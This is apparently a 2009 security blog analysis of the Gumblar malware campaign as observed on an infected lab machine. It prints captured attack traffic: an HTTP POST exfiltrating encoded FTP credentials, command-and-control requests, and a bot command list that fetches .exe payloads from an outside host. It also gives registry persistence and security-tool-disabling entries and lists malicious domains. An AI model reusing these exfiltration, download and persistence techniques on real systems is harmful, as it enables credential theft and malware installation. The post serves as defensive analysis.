Inside the Massive Gumblar AttackA Dentro del Enorme Ataque Gumblar

I first found out about Gumblar a couple days ago via one of Scan Safe’s blog posts. Responsible for 42% of “all malicious infections found on websites” (Sophos) during a 7 day period, Gumblar (JSRedir-R)  has been extremely effective at propagating. Many bloggers have been focusing on the script involved in the attack, not so much on what happens when a client is compromised. I will attempt to cover this portion of the attack in detail.

Summary

Once compromised by the Gumblar / Martuz / Geno attack, victims will have many pieces of malware loaded onto their machines, this malware does the following:

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

The exploits used are for Adobe Acrobat and Adobe Flash Player.

Some further reading:

unmaskparasites
dynamoo

FTP credential stealing

While observing the bot in my lab the first thing that indicated the ability to steal credentials was the bot trying to put my network card into promiscuous mode. I then logged into ftp.mozilla.org as anonymous and sure enough my credentials were ex filtrated in an encoded format.

POST /good/receiver/ftp HTTP/1.1
Host: 78.109.29.114
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lIGgQw

Doing a little recon, we can see the attacker is using “Capture Manager v1.0″, a purchase which seems to be really paying off for them

Capture Manager

Capture Manager

As mentioned earlier, the malware downloads software to sniff network traffic, winpcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.

An entry is made in the registry for winpcap: HKLM\SOFTWARE\WinPcap

SPAM

The first time I infected myself with the malware, a SPAM bot was installed that had communication that looked like Pushdo. However the second time I infected myself the malware exhibited different behavior and did not send the same traffic. My firewall still recorded drops on port 25, so the malware authors must be deploying a different SPAM engine now. I have not had a chance to investigate this portion of the attack any further.

Fake Antivirus

As with so many attacks as of late, fake anti virus is also installed on the affected machines. In this case it is “System Security 2009″, screenshots below.

av3

av22

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009

Search Hijacking

The next portion of the attack involves hijacking google search results. The malware installs a proxy on port 7171 which then redirects searches. When a user searches for something, the malware will send the user to a page of it’s choosing filled with bogus search results. Here is an example of what you get after clicking a google search result for “car”.

car1

Sys32dll.exe contains the proxy which has a firewall bypass rule added as well. Also note that a rule is added for port 80.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: “http=localhost:7171″
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: “80:TCP:*:Enabled:SYS32DLL”
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: “7171:TCP:*:Enabled:SYS32DLL”

Disable Security Software

In order to keep itself running and make life more difficult for both analysts and users, the malware disables many security and administrative tools by sending them to the windows system debugger. Here is an example:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: “ntsd -d”

And here is a list of all the blocked applications:

a2service.exe
ArcaCheck.exe
arcavir.exe
ashDisp.exe
ashEnhcd.exe
ashServ.exe
ashUpd.exe
aswUpdSv.exe
autoruns.exe
avadmin.exe
avcenter.exe
avcls.exe
avconfig.exe
avconsol.exe
avgnt.exe
avgrssvc.exe
avguard.exe
AvMonitor.exe
avp.com
avp.exe
AVP32.EXE
avscan.exe
avz.exe
avz4.exe
avz_se.exe
bdagent.exe
bdinit.exe
caav.exe
caavguiscan.exe
casecuritycenter.exe
CCenter.exe
ccupdate.exe
cfp.exe
cfpupdat.exe
cmdagent.exe
drwadins.exe
DRWEB32.EXE
drwebupw.exe
ekrn.exe
FAMEH32.EXE
filemon.exe
FPAVServer.exe
fpscan.exe
FPWin.exe
fsav32.exe
fsgk32st.exe
FSMA32.EXE
GFRing3.exe
guardgui.exe
guardxservice.exe
guardxup.exe
HijackThis.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPF.exe
KAVPFW.exe
KAVStart.exe
KPFW32.exe
KPFW32X.exe
Navapsvc.exe
Navapw32.exe
navigator.exe
NAVNT.EXE
NAVSTUB.EXE
NAVW32.EXE
NAVWNT.EXE
niu.exe
nod32.exe
nod32krn.exe
Nvcc.exe
OllyDBG.EXE
outpost.exe
preupd.exe
procexp.exe
pskdr.exe
regedit.exe
regmon.exe
RegTool.exe
scan32.exe
SfFnUp.exe
Vba32arkit.exe
vba32ldr.exe
vsserv.exe
Zanda.exe
zapro.exe
Zlh.exe
zonealarm.exe
zoneband.dll

Domains

Since both gumblar.cn and martuz.cn are down as of this writing, I will discuss the secondary domains involved in the attack. These are the domains that actually host the malware and exploits and listen on port 8080 so they may seem offline if you try connecting directly.

autobestwestern.cn
bestlotron.cn
betbigwager.cn
denverfilmdigitalmedia.cn
educationbigtop.cn
filmtypemedia.cn
finditbig.cn
greatbethere.cn
hotslotpot.cn
liteautotop.cn
litebest.cn
litegreatestdirect.cn
litetopdetect.cn
lotbetsite.cn
lotwageronline.cn
mediahomenamemartvideo.cn
nameashop.cn
perfectnamestore.cn
playbetwager.cn
bestfindaloan.cn
finditbig.cn
litetopdetect.cn
litetopfindworld.cn
lotwageronline.cn
nanotopdiscover.cn
torrentoreactor.net
bestfindaloan.cn
finditbig.cn
litegreatestdirect.cn
lotwageronline.cn

These are additional domains involved in the attack:

nua20090515.com – C&C
i-site.ph – binary download
zz-dns.com – additional C&C?
main15052009.com – fake av related?
besthandycap.com
ya.ru
…and many more…

Other Information

Malware startup

1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: “C:\WINDOWS\system32\asferrort.exe srv”
2) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\Temp\wpv701242765100.exe”
3) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: “c:\windows\pp10.exe” (I also saw pp08.exe, so this name is variable)
4) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: “C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe”
5) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: “C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe”
6) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: “c:\windows\ld08.exe”

An additional security provider is also installed in the form of digiwet.dll, I have not investigated this piece of the attack.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: “msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll”

A BHO (browser helper object) is also installed here:

HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: “C:\WINDOWS\system32\547372\547372.dll”

One of the pieces of malware (ld08.exe) also hooks several APIs:

hooks

C&C communication

The magic number field below may be a key to encode the further communication to hamper analysis.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=953988293&rnd=981633 HTTP/1.1

Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 581632
Entity-Info: 1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;

Rnd: 982147
Magic-Number: 1024|1|121:12:234:245:236:103:151:67:93:53:56:150:6:94:36:63:106:66:140:194:113:23:183:92:85:78:68:182:185:205:58:51:217:36:40:198:140:191:10:234:245:66:128:252:160:164:59:10:230:200:205:88:223:132:181:53:210:249:235:140:198:38:191:160:74:231:102:215:167:113:193:156:180:65:152:85:230:211:95:205:155:45:37:123:178:218:176:132:211:156:16:154:194:208:58:13:183:161:228:95:19:166:251:199:232:148:28:206:104:124:155:4:170:193:127:92:155:48:224:111:204:241:10:143:194:69:156:121:231:129:217:250:39:212:194:15:105:223:222:209:92:122:214:6:59:85:98:215:134:67:71:83:53:82:226:247:151:126:113:127:0:74:122:39:31:60:55:136:28:22:90:120:144:48:126:204:134:225:164:12:36:236:95:89:62:65:81:214:192:194:85:193:13:207:232:44:12:32:181:40:54:15:161:199:64:31:148:198:0:57:211:37:38:51:127:100:117:208:59:53:147:144:247:160:96:223:204:108:0:130:149:55:145:54:255:210:86:148:153:87:205:108:124:243:159:252:88:20:204:148:74:96:36:65:0:133:33:205:242:34:79:136:89:225:190:89:179:20:237:77:108:187:185:232:175:89:228:7:110:177:155:185:17:192:251:18:70:29:223:56:63:47:192:153:16:127:243:196:148:224:17:0:155:203:233:74:37:205:82:148:127:238:78:145:174:73:163:244:103:131:45:166:178:238:64:195:110:51:135:2:20:153:2:175:101:235:250:138:185:76:30:57:58:108:202:233:182:110:222:29:241:12:196:164:251:5:103:105:57:239:107:77:136:110:253:237:90:247:120:20:68:150:77:127:3:24:105:186:135:71:216:121:84:156:29:79:162:132:184:219:116:36:40:252:146:37:233:236:29:98:0:97:249:78:225:252:102:74:183:237:146:143:102:231:44:132:54:206:9:239:169:125:19:209:121:166:247:99:146:20:197:147:118:190:225:88:187:72:162:115:54:53:2:157:28:47:33:83:253:42:66:167:167:86:121:33:252:112:133:143:133:75:34:252:9:4:84:197:77:247:56:131:44:59:32:73:106:66:156:104:108:222:15:20:52:136:53:49:249:186:192:126:5:227:122:15:232:207:213:53:198:13:185:242:73:218:59:179:28:216:28:136:182:43:156:235:179:210:28:172:141:220:43:146:192:166:162:168:117:119:222:59:133:151:46:206:113:106:130:142:66:159:23:249:202:180:228:126:134:1:43:19:222:86:166:158:253:73:71:114:193:37:174:70:188:220:21:46:70:152:188:137:55:211:130:2:136:103:128:14:104:171:34:71:2:201:229:255:18:44:114:211:81:32:26:14:253:47:60:67:200:249:205:255:205:79:1:85:182:130:100:31:45:135:102:48:80:76:48:99:121:162:55:203:194:81:217:191:129:22:3:73:16:208:73:222:32:75:51:215:205:152:247:251:31:94:44:112:170:92:211:36:254:10:239:193:91:201:129:221:224:132:38:241:85:112:207:118:188:3:77:137:155:69:133:187:163:178:43:78:14:254:114:13:8:98:206:100:43:79:65:12:212:104:253:42:217:204:160:149:207:238:31:107:51:165:38:214:87:81:36:101:79:151:115:88:249:65:189:37:145:255:49:102:104:46:144:65:250:49:214:202:31:246:53:83:155:91:42:242:172:79:88:252:230:203:85:223:13:19:5:159:18:54:5:123:100:150:189:95:199:147:42:231:138:95:58:37:187:101:24:104:180:112:101:155:60:186:123:74:206:128:233:225:182:239:92:27:133:25:123:77:173:165:52:55:5:111:93:192:213:117:40:137:230:141:37:35:72:160:109:22:33:87:247:216:70:84:243:204:110:111:25:27:20:78:83:25:190:176:218:147:38:2:28:13:144:66:48:217:227:158:239:4:245:231:221:60:60:208:9:170:64:35:198:84:113:25:110:47:202:73:194:240:76:223:254:220:34:46:181:5:205:165:10:195:141:231:0:201:184:9:116:248:44:58:77:158:83:188:206:30:5:145:15:81:113:13:46:147:60:228:153:9:137:163:205:23:138:205:225:67:214:85:59:3:143:136:161:227:69:112:2:74:1:17:156:114:30:202:5:91:174:159:100:56:66:50:79:205:255:49:16:213:134:75:217:22:212:123:250:26:235:252:100:236:14:1:95:44:203:100:135:122:4:236:179:70:30:3:19:30:52:36:243:187:112:205:209:69:72:204:95:51:201:196:32:215:197:127:3:145:228:139:11:232:120:191:46:151:194:66:181:246:103:169:177:215:119:131:28:191:80:123:242:25:63:18:240:4:145:244:149:118:
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1241292389:unique_start;1241530597:unique_start;1241643870:unique_start;1242216620:unique_start;1242765100:unique_start HTTP/1.1

Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close

X-Powered-By: PHP/5.1.6
Content-Length: 0

This next portion is the bot receiving it’s commands on what files to download next

POST /ld/gen.php HTTP/1.1
Host: nua20090515.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

f=0&a=953988293&v=08&c=0&s=ld&l=8174&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:37:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
9a
#PID=8174
START|http://www.i-site.ph/1/6244.exe
START|http://www.i-site.ph/1/nfr.exe
STARTONCE|http://www.i-site.ph/1/pp.10.exe
WAIT|120
#BLACKLABEL
EXIT
0

Another GET that appears to be a bot check in type request, note the lack of user agent.

GET /v50/?v=66&s=I&uid=953988293&p=8174&q= HTTP/1.0
Host: 85.13.236.154
User-Agent:
HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:39:28 GMT
Server: Apache/2.2.10 (Fedora)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache
Work-Server: 85.13.236.154
Content-Length: 0
Connection: close
Content-Type: text/html

That’s all the analysis I have time for at the moment, this is a very large attack encompasing many malicious payloads. Hopefully more analysis will follow.

Comments are closed.